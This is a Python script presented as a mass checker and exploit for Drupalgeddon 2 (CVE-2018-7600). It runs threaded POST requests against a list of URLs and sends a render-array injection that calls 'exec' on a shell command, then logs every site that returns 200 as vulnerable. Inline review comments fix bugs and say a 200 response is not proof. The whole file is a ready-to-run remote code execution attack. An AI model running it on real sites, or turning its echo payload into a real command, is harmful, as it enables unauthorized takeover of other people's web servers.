Drupalgeddon-mass.py
#!/usr/bin/python
import requests
import threading
import Queue
import sys
import time
import argparse
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning for the whole process.
# NOTE(review): no request in this file passes verify=False, so certificate
# verification stays at the requests default and this suppression appears to
# have no effect here. Confirm before relying on it either way.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#Drupal Drupalgeddon 2
#(SA-CORE-2018-002 / CVE-2018-7600)
#Exploit by Dan Sharvit - (Shlacky) - Cynoia.com linkedin.com/in/dansharv
#https://github.com/sl4cky/CVE-2018-7600
#mass vulnerability checker
# ANSI SGR escape sequences used to colour terminal output.
G, Y, B, R = '\033[92m', '\033[93m', '\033[94m', '\033[91m'  # green, yellow, blue, red
W = '\033[0m'  # SGR reset: restores the terminal's default attributes
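def parse_args():
    """Parse the command line and return the argparse namespace.

    Options:
        -f/--file     path of a text file holding one URL per line (required)
        -o/--output   optional path that flagged URLs are appended to
        -t/--threads  number of worker threads, default 10

    ``--threads`` is converted with ``type=int``. Without the conversion a
    value given on the command line arrives as a string and ``range(threads)``
    in main() raises TypeError.
    """
    parser = argparse.ArgumentParser(epilog='')
    parser._optionals.title = "OPTIONS"
    parser.add_argument('-f', '--file', help="file with urls to test", required=True)
    parser.add_argument('-o', '--output', help="output to write vulnerable servers", required=False)
    parser.add_argument('-t', '--threads', help="amount of threads", required=False, default=10, type=int)
    return parser.parse_args()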
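class exploit(threading.Thread):
    """Worker thread that takes URLs from a shared queue and probes each one.

    Every URL receives the CVE-2018-7600 (SA-CORE-2018-002) form request
    built in check_url. A URL whose response status is 200 is reported and,
    when the module-level ``output`` path is set, appended to that file.
    """

    # Seconds allowed for connect/read, so one unresponsive host cannot
    # block a worker (and therefore queue.join()) indefinitely.
    REQUEST_TIMEOUT = 10

    def __init__(self, queue):
        """Store the shared work queue the thread will consume from."""
        threading.Thread.__init__(self)
        self.queue = queue

    def write_to_file(self, url):
        """Append ``url`` as one line to the file named by the global ``output``."""
        # The with-block closes the handle; no explicit close() is needed.
        with open(output, 'a+') as f:
            f.write(url + "\n")

    def check_url(self, url):
        """Send the probe request to ``url`` and report the outcome.

        The request shape is fixed: a POST to ``/user/register`` with
        ``element_parents=account/mail/%23value&ajax_form=1`` in the query
        string and ``mail[#...]`` keys in the form body. That fixed shape is
        also what access logs and WAF rules can match on.

        Request errors are printed and the method returns, so the worker
        keeps running instead of terminating.
        """
        target_url = "{}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax".format(url)
        headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
        form = {"form_id": "user_register_form", "_drupal_ajax": "1", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": "echo 'hehe'"}
        try:
            r = requests.post(target_url, headers=headers, data=form, timeout=self.REQUEST_TIMEOUT)
        except requests.exceptions.RequestException as err:
            # The original left the message as a bare string expression that
            # was never printed, then called sys.exit(1). Inside a thread that
            # only ends the worker and leaves the queue item unfinished.
            print("[*] An error occurred while testing {}: {}".format(url, err))
            return
        if r.status_code == 200:
            # NOTE(review): only the status code is checked and the response
            # body is never inspected. A 200 is a candidate finding to be
            # confirmed against the installed Drupal version, not proof.
            print("{}[!] {} is vulnerable{}".format(R, url, W))
            if output:
                try:
                    self.write_to_file(url)
                except (IOError, OSError) as err:
                    print("[*] Could not write to {}: {}".format(output, err))
        else:
            print("[*] - Testing {}".format(url))

    def run(self):
        """Consume URLs from the queue until the process exits.

        Workers are started as daemon threads by main(), so the loop has no
        exit condition of its own.
        """
        while True:
            try:
                url = self.queue.get(timeout=0.2)
            except Queue.Empty:
                continue
            try:
                self.check_url(url)
            finally:
                # Always balance get() with task_done(); otherwise a failure
                # in check_url would leave queue.join() waiting forever.
                self.queue.task_done()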
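def main():
    """Load the URL list, start the worker threads and wait for the queue to drain.

    Reads the module-level names ``file`` and ``threads`` that the
    ``__main__`` guard binds from the parsed arguments. Exits with status 1
    when the input file does not exist.
    """
    if not os.path.isfile(file):
        print("[*] Your inputfile doesn't exist")
        sys.exit(1)
    global urls
    # Close the handle deterministically and skip blank lines, which would
    # otherwise be queued as empty URLs.
    with open(file, 'r') as handle:
        urls = [line.strip() for line in handle if line.strip()]
    queue = Queue.Queue()
    # int() keeps range() working when the thread count arrives as a string.
    # At least one worker is required or queue.join() never returns.
    worker_count = max(1, int(threads))
    for _ in range(worker_count):
        t = exploit(queue)
        t.daemon = True
        t.start()
    for url in urls:
        queue.put(url)
    queue.join()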
if __name__ == '__main__':
    # main() and the worker class read file, threads and output as module
    # globals, so all three are bound here before main() is called.
    args = parse_args()
    file, threads, output = args.file, args.threads, args.output
    main()